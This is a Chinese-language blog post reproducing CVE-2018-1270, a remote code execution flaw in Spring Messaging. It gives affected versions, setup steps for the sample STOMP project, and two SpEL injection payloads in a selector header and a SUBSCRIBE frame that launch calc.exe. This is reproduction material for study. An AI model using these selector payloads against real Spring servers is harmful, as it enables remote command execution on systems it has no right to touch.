Spring Messaging远程代码执行漏洞(CVE-2018-1270)

Security Classification: 【C-1】 | Publish Time:2024-04-01 | Category:漏洞分析 | Edit

Expiry Notice: The article was published three months ago. Please independently assess the validity of the technical methods and code mentioned within. :)

## 环境准备

[下载漏洞源码](https://github.com/spring-guides/gs-messaging-stomp-websocket/tree/6958af0b02bf05282673826b73cd7a85e84c12d3)

打开pom.xml文件，导入项目，添加maven，注意修改jdk版本
![](https://p0.meituan.net/xianfu/bebd430a273583bbd0597aaa0dd17ca2159096.png%40watermark=1&&object=L3dkY2Zsb3cvN2RiN2M4NTFjYmVjZDg4MTM1OTZjMTYzOWE2MzQ4MDM0MjY0LnBuZw==&p=8&t=90&x=10&y=10)

**漏洞影响版本：**

> Spring Framework 5.0 to 5.0.4
>
> Spring Framework 4.3 to 4.3.14

调试：添加一个debug

![](https://p0.meituan.net/xianfu/605b2bd86e63fb2941e36ae65d1b51d2254106.png%40watermark=1&&object=L3dkY2Zsb3cvN2RiN2M4NTFjYmVjZDg4MTM1OTZjMTYzOWE2MzQ4MDM0MjY0LnBuZw==&p=8&t=90&x=10&y=10)

## 漏洞复现

### 修改app.js

在src/main/resources/static/app.js里的connect()中添加

```java
var header  = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
```

或者直接修改前端js

![](https://p0.meituan.net/xianfu/2abd5716bffa9436dce9e203e091a0aa153895.png%40watermark=1&&object=L3dkY2Zsb3cvN2RiN2M4NTFjYmVjZDg4MTM1OTZjMTYzOWE2MzQ4MDM0MjY0LnBuZw==&p=8&t=90&x=10&y=10)

点击**connect**后，在输入框中输入任意值后点击**send**
![](https://p0.meituan.net/xianfu/0f50475c5f484dcc572052bccbfee883113019.png%40watermark=1&&object=L3dkY2Zsb3cvN2RiN2M4NTFjYmVjZDg4MTM1OTZjMTYzOWE2MzQ4MDM0MjY0LnBuZw==&p=8&t=90&x=10&y=10)

### 抓包修改

点击**connect**进行抓包，出现**WebSockets message to**时修改请求包为：

```java
["SUBSCRIBE\nid:sub-0\ndestination:/topic/greetings\nselector:new java.lang.ProcessBuilder('calc.exe').start()  \n\n\u0000"]
```

![](https://p0.meituan.net/xianfu/0fd4d404f51c9a3ad7081ac363e57b43104467.png%40watermark=1&&object=L3dkY2Zsb3cvN2RiN2M4NTFjYmVjZDg4MTM1OTZjMTYzOWE2MzQ4MDM0MjY0LnBuZw==&p=8&t=90&x=10&y=10)

Comment List

0a97651b 2024/01/29

牛逼

Comment

© Copyright: This article is an original work and the copyright belongs to the Panacea's blog unless marked as Reproduced

Please contact the blogger for authorization to reprint

Spring Messaging远程代码执行漏洞(CVE-2018-1270)

© Copyright: This article is an original work and the copyright belongs to the Panacea's blog unless marked as ReproducedPlease contact the blogger for authorization to reprint

© Copyright: This article is an original work and the copyright belongs to the Panacea's blog unless marked as Reproduced

Please contact the blogger for authorization to reprint